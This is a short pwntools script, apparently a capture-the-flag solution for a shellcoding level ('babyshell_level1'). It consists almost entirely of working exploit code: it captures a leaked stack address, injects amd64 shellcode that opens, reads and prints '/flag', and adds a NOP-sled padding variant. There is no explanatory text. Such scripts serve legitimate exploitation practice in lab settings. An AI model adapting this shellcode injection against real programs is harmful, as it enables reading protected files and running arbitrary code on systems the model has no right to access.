1
from pwn import *
context.log_level='info'
r = process("/challenge/babyshell_level1")
r.recvuntil("[LEAK] Placing shellcode on the stack at 0x")
addr = int(r.recvline()[:-2], 16)
log.success("addr => {}".format(hex(addr)))
shellcode = shellcraft.amd64.open("/flag")
shellcode+= shellcraft.amd64.read('rax', addr+0x100, 0x100)
shellcode+= shellcraft.amd64.write(1, addr+0x100, 0x100)
payload = asm(shellcode, arch='amd64')
r.recv()
r.sendline(payload)
r.interactive()
2
payload = asm(shellcode, arch='amd64').rjust(0x900, b'\x90')
Q.E.D.